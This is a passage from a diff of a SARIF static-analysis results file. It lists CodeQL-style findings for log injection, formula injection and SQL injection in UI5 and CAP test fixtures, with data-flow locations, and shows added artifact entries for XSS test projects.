(value)" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 3 - }, - "region" : { - "startLine" : 23, - "startColumn" : 9, - "endColumn" : 45 - } - }, - "message" : { - "text" : "value1" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 3 - }, - "region" : { - "startLine" : 25, - "startColumn" : 26, - "endColumn" : 32 - } - }, - "message" : { - "text" : "value1" - } - } - } ] - } ] - } ], - "relatedLocations" : [ { - "id" : 1, - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 3 - }, - "region" : { - "startLine" : 21, - "startColumn" : 23, - "endColumn" : 30 - } - }, - "message" : { - "text" : "user-provided value" - } - } ] + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/package-lock.json", + "uriBaseId" : "%SRCROOT%", + "index" : 155 + } }, { - "ruleId" : "js/ui5-log-injection", - "rule" : { - "id" : "js/ui5-log-injection", - "index" : 3, - "toolComponent" : { - "index" : 2 - } - }, - "message" : { - "text" : "Log entry depends on a [user-provided value](1)." - }, - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 180 - }, - "region" : { - "startLine" : 17, - "startColumn" : 38, - "endColumn" : 47 - } - } - } ], - "partialFingerprints" : { - "primaryLocationLineHash" : "f32b0dcd4573d6a3:1", - "primaryLocationStartColumnFingerprint" : "21" - }, - "codeFlows" : [ { - "threadFlows" : [ { - "locations" : [ { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 185 - }, - "region" : { - "startLine" : 5, - "startColumn" : 5, - "endLine" : 7, - "endColumn" : 29 - } - }, - "message" : { - "text" : "value={/input}" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 181 - }, - "region" : { - "startLine" : 9, - "startColumn" : 17, - "endColumn" : 28 - } - }, - "message" : { - "text" : "input: null" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 180 - }, - "region" : { - "startLine" : 8, - "startColumn" : 23, - "endColumn" : 41 - } - }, - "message" : { - "text" : "{ type: \"string\" }" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 180 - }, - "region" : { - "startLine" : 15, - "startColumn" : 29, - "endColumn" : 47 - } - }, - "message" : { - "text" : "oControl.getText()" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 180 - }, - "region" : { - "startLine" : 15, - "startColumn" : 21, - "endColumn" : 47 - } - }, - "message" : { - "text" : "value" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 180 - }, - "region" : { - "startLine" : 16, - "startColumn" : 50, - "endColumn" : 55 - } - }, - "message" : { - "text" : "value" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 180 - }, - "region" : { - "startLine" : 16, - "startColumn" : 43, - "endColumn" : 56 - } - }, - "message" : { - "text" : "String(value)" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 180 - }, - "region" : { - "startLine" : 16, - "startColumn" : 33, - "endColumn" : 57 - } - }, - "message" : { - "text" : "encodeX ... value))" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 180 - }, - "region" : { - "startLine" : 16, - "startColumn" : 21, - "endColumn" : 57 - } - }, - "message" : { - "text" : "sanitized" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 180 - }, - "region" : { - "startLine" : 17, - "startColumn" : 38, - "endColumn" : 47 - } - }, - "message" : { - "text" : "sanitized" - } - } - } ] - } ] - } ], - "relatedLocations" : [ { - "id" : 1, - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 185 - }, - "region" : { - "startLine" : 5, - "startColumn" : 5, - "endLine" : 7, - "endColumn" : 29 - } - }, - "message" : { - "text" : "user-provided value" - } - } ] + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 156 + } }, { - "ruleId" : "js/ui5-log-injection", - "rule" : { - "id" : "js/ui5-log-injection", - "index" : 3, - "toolComponent" : { - "index" : 2 - } - }, - "message" : { - "text" : "Log entry depends on a [user-provided value](1)." - }, - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 189 - }, - "region" : { - "startLine" : 17, - "startColumn" : 34, - "endColumn" : 39 - } - } - } ], - "partialFingerprints" : { - "primaryLocationLineHash" : "392fd43c95c7be9c:1", - "primaryLocationStartColumnFingerprint" : "21" - }, - "codeFlows" : [ { - "threadFlows" : [ { - "locations" : [ { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 193 - }, - "region" : { - "startLine" : 6, - "startColumn" : 5, - "endLine" : 8, - "endColumn" : 29 - } - }, - "message" : { - "text" : "value={/input}" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 189 - }, - "region" : { - "startLine" : 9, - "startColumn" : 17, - "endColumn" : 28 - } - }, - "message" : { - "text" : "input: null" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 189 - }, - "region" : { - "startLine" : 15, - "startColumn" : 25, - "endColumn" : 53 - } - }, - "message" : { - "text" : "oModel. ... input')" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 189 - }, - "region" : { - "startLine" : 15, - "startColumn" : 17, - "endColumn" : 53 - } - }, - "message" : { - "text" : "input" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 189 - }, - "region" : { - "startLine" : 17, - "startColumn" : 34, - "endColumn" : 39 - } - }, - "message" : { - "text" : "input" - } - } - } ] - } ] - } ], - "relatedLocations" : [ { - "id" : 1, - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 193 - }, - "region" : { - "startLine" : 6, - "startColumn" : 5, - "endLine" : 8, - "endColumn" : 29 - } - }, - "message" : { - "text" : "user-provided value" - } - } ] + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/manifest.json", + "uriBaseId" : "%SRCROOT%", + "index" : 157 + } }, { - "ruleId" : "js/ui5-log-injection", - "rule" : { - "id" : "js/ui5-log-injection", - "index" : 3, - "toolComponent" : { - "index" : 2 - } - }, - "message" : { - "text" : "Log entry depends on a [user-provided value](1)." - }, - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-remote/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 197 - }, - "region" : { - "startLine" : 16, - "startColumn" : 30, - "endColumn" : 35 - } - } - } ], - "partialFingerprints" : { - "primaryLocationLineHash" : "27d08bf2c216b384:1", - "primaryLocationStartColumnFingerprint" : "21" - }, - "codeFlows" : [ { - "threadFlows" : [ { - "locations" : [ { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-remote/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 202 - }, - "region" : { - "startLine" : 5, - "startColumn" : 5, - "endLine" : 7, - "endColumn" : 29 - } - }, - "message" : { - "text" : "value={/input}" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-remote/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 197 - }, - "region" : { - "startLine" : 8, - "startColumn" : 11, - "endColumn" : 22 - } - }, - "message" : { - "text" : "input: null" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-remote/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 197 - }, - "region" : { - "startLine" : 14, - "startColumn" : 21, - "endColumn" : 49 - } - }, - "message" : { - "text" : "oModel. ... input\")" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-remote/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 197 - }, - "region" : { - "startLine" : 14, - "startColumn" : 13, - "endColumn" : 49 - } - }, - "message" : { - "text" : "input" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-remote/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 197 - }, - "region" : { - "startLine" : 16, - "startColumn" : 30, - "endColumn" : 35 - } - }, - "message" : { - "text" : "input" - } - } - } ] - } ] - } ], - "relatedLocations" : [ { - "id" : 1, - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-remote/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 202 - }, - "region" : { - "startLine" : 5, - "startColumn" : 5, - "endLine" : 7, - "endColumn" : 29 - } - }, - "message" : { - "text" : "user-provided value" - } - } ] + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 158 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-js-view/package-lock.json", + "uriBaseId" : "%SRCROOT%", + "index" : 159 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-js-view/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 160 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-js-view/webapp/manifest.json", + "uriBaseId" : "%SRCROOT%", + "index" : 161 + } }, { - "ruleId" : "js/ui5-log-injection", - "rule" : { - "id" : "js/ui5-log-injection", - "index" : 3, - "toolComponent" : { - "index" : 2 - } - }, - "message" : { - "text" : "Log entry depends on a [user-provided value](1)." - }, - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-html-control-df/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 206 - }, - "region" : { - "startLine" : 17, - "startColumn" : 34, - "endColumn" : 39 - } - } - } ], - "partialFingerprints" : { - "primaryLocationLineHash" : "392fd43c95c7be9c:1", - "primaryLocationStartColumnFingerprint" : "21" - }, - "codeFlows" : [ { - "threadFlows" : [ { - "locations" : [ { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-html-control-df/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 210 - }, - "region" : { - "startLine" : 5, - "startColumn" : 5, - "endLine" : 7, - "endColumn" : 29 - } - }, - "message" : { - "text" : "value={/input}" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-html-control-df/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 206 - }, - "region" : { - "startLine" : 9, - "startColumn" : 17, - "endColumn" : 28 - } - }, - "message" : { - "text" : "input: null" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-html-control-df/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 206 - }, - "region" : { - "startLine" : 15, - "startColumn" : 25, - "endColumn" : 53 - } - }, - "message" : { - "text" : "oModel. ... input')" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-html-control-df/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 206 - }, - "region" : { - "startLine" : 15, - "startColumn" : 17, - "endColumn" : 53 - } - }, - "message" : { - "text" : "input" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-html-control-df/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 206 - }, - "region" : { - "startLine" : 17, - "startColumn" : 34, - "endColumn" : 39 - } - }, - "message" : { - "text" : "input" - } - } - } ] - } ] - } ], - "relatedLocations" : [ { - "id" : 1, - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-html-control-df/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 210 - }, - "region" : { - "startLine" : 5, - "startColumn" : 5, - "endLine" : 7, - "endColumn" : 29 - } - }, - "message" : { - "text" : "user-provided value" - } - } ] + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-json-view/package-lock.json", + "uriBaseId" : "%SRCROOT%", + "index" : 162 + } }, { - "ruleId" : "js/ui5-formula-injection", - "rule" : { - "id" : "js/ui5-formula-injection", - "index" : 4, - "toolComponent" : { - "index" : 2 - } - }, - "message" : { - "text" : "The content of a saved file depends on a [user-provided value](1)." - }, - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-property-sanitized/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 145 - }, - "region" : { - "startLine" : 17, - "startColumn" : 27, - "endColumn" : 45 - } - } - } ], - "partialFingerprints" : { - "primaryLocationLineHash" : "41899ff1a967017d:1", - "primaryLocationStartColumnFingerprint" : "10" - }, - "codeFlows" : [ { - "threadFlows" : [ { - "locations" : [ { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-property-sanitized/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 150 - }, - "region" : { - "startLine" : 5, - "startColumn" : 5, - "endLine" : 7, - "endColumn" : 29 - } - }, - "message" : { - "text" : "value={/input}" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-property-sanitized/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 146 - }, - "region" : { - "startLine" : 9, - "startColumn" : 17, - "endColumn" : 28 - } - }, - "message" : { - "text" : "input: null" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-property-sanitized/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 145 - }, - "region" : { - "startLine" : 8, - "startColumn" : 23, - "endColumn" : 38 - } - }, - "message" : { - "text" : "{ type: \"int\" }" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-property-sanitized/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 145 - }, - "region" : { - "startLine" : 17, - "startColumn" : 27, - "endColumn" : 45 - } - }, - "message" : { - "text" : "oControl.getText()" - } - } - } ] - } ] - } ], - "relatedLocations" : [ { - "id" : 1, - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-property-sanitized/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 150 - }, - "region" : { - "startLine" : 5, - "startColumn" : 5, - "endLine" : 7, - "endColumn" : 29 - } - }, - "message" : { - "text" : "user-provided value" - } - } ] + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-json-view/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 163 + } }, { - "ruleId" : "js/ui5-formula-injection", - "rule" : { - "id" : "js/ui5-formula-injection", - "index" : 4, - "toolComponent" : { - "index" : 2 - } - }, - "message" : { - "text" : "The content of a saved file depends on a [user-provided value](1)." - }, - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 154 - }, - "region" : { - "startLine" : 23, - "startColumn" : 27, - "endColumn" : 39 - } - } - } ], - "partialFingerprints" : { - "primaryLocationLineHash" : "9afa5fd07ee36af6:1", - "primaryLocationStartColumnFingerprint" : "10" - }, - "codeFlows" : [ { - "threadFlows" : [ { - "locations" : [ { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 159 - }, - "region" : { - "startLine" : 5, - "startColumn" : 5, - "endLine" : 7, - "endColumn" : 29 - } - }, - "message" : { - "text" : "value={/input}" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 155 - }, - "region" : { - "startLine" : 9, - "startColumn" : 17, - "endColumn" : 28 - } - }, - "message" : { - "text" : "input: null" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 154 - }, - "region" : { - "startLine" : 9, - "startColumn" : 23, - "endColumn" : 41 - } - }, - "message" : { - "text" : "{ type: \"string\" }" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 154 - }, - "region" : { - "startLine" : 15, - "startColumn" : 29, - "endColumn" : 47 - } - }, - "message" : { - "text" : "oControl.getText()" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 154 - }, - "region" : { - "startLine" : 15, - "startColumn" : 21, - "endColumn" : 47 - } - }, - "message" : { - "text" : "value" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 154 - }, - "region" : { - "startLine" : 17, - "startColumn" : 53, - "endColumn" : 58 - } - }, - "message" : { - "text" : "value" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 154 - }, - "region" : { - "startLine" : 17, - "startColumn" : 46, - "endColumn" : 59 - } - }, - "message" : { - "text" : "String(value)" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 154 - }, - "region" : { - "startLine" : 17, - "startColumn" : 36, - "endColumn" : 60 - } - }, - "message" : { - "text" : "encodeX ... value))" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 154 - }, - "region" : { - "startLine" : 17, - "startColumn" : 21, - "endColumn" : 60 - } - }, - "message" : { - "text" : "xssSanitized" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 154 - }, - "region" : { - "startLine" : 23, - "startColumn" : 27, - "endColumn" : 39 - } - }, - "message" : { - "text" : "xssSanitized" - } - } - } ] - } ] - } ], - "relatedLocations" : [ { - "id" : 1, - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 159 - }, - "region" : { - "startLine" : 5, - "startColumn" : 5, - "endLine" : 7, - "endColumn" : 29 - } - }, - "message" : { - "text" : "user-provided value" - } - } ] + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-json-view/webapp/manifest.json", + "uriBaseId" : "%SRCROOT%", + "index" : 164 + } }, { - "ruleId" : "js/ui5-formula-injection", - "rule" : { - "id" : "js/ui5-formula-injection", - "index" : 4, - "toolComponent" : { - "index" : 2 - } - }, - "message" : { - "text" : "The content of a saved file depends on a [user-provided value](1)." - }, - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 166 - }, - "region" : { - "startLine" : 16, - "startColumn" : 23, - "endColumn" : 51 - } - } - } ], - "partialFingerprints" : { - "primaryLocationLineHash" : "e701acdf85af03b4:1", - "primaryLocationStartColumnFingerprint" : "10" - }, - "codeFlows" : [ { - "threadFlows" : [ { - "locations" : [ { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 167 - }, - "region" : { - "startLine" : 5, - "startColumn" : 5, - "endLine" : 7, - "endColumn" : 29 - } - }, - "message" : { - "text" : "value={/input}" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 166 - }, - "region" : { - "startLine" : 10, - "startColumn" : 17, - "endColumn" : 28 - } - }, - "message" : { - "text" : "input: null" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 166 - }, - "region" : { - "startLine" : 16, - "startColumn" : 23, - "endColumn" : 51 - } - }, - "message" : { - "text" : "oModel. ... input')" - } - } - } ] - } ] - } ], - "relatedLocations" : [ { - "id" : 1, - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 167 - }, - "region" : { - "startLine" : 5, - "startColumn" : 5, - "endLine" : 7, - "endColumn" : 29 - } - }, - "message" : { - "text" : "user-provided value" - } - } ] + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-json-view/webapp/view/app.view.json", + "uriBaseId" : "%SRCROOT%", + "index" : 165 + } }, { - "ruleId" : "js/cap-sql-injection", - "rule" : { - "id" : "js/cap-sql-injection", - "index" : 0, - "toolComponent" : { - "index" : 0 - } - }, - "message" : { - "text" : "This query depends on a [user-provided value](1)." - }, - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 13, - "startColumn" : 36, - "endColumn" : 41 - } - } - } ], - "partialFingerprints" : { - "primaryLocationLineHash" : "e5ae8639cd6967fb:1", - "primaryLocationStartColumnFingerprint" : "29" - }, - "codeFlows" : [ { - "threadFlows" : [ { - "locations" : [ { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 7, - "startColumn" : 34, - "endColumn" : 37 - } - }, - "message" : { - "text" : "req" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 8, - "startColumn" : 34, - "endColumn" : 37 - } - }, - "message" : { - "text" : "req" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 8, - "startColumn" : 34, - "endColumn" : 42 - } - }, - "message" : { - "text" : "req.data" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 8, - "startColumn" : 13, - "endColumn" : 31 - } - }, - "message" : { - "text" : "{ book, quantity }" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 8, - "startColumn" : 15, - "endColumn" : 19 - } - }, - "message" : { - "text" : "book" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 8, - "startColumn" : 13, - "endColumn" : 42 - } - }, - "message" : { - "text" : "book" - } - } - }, { - 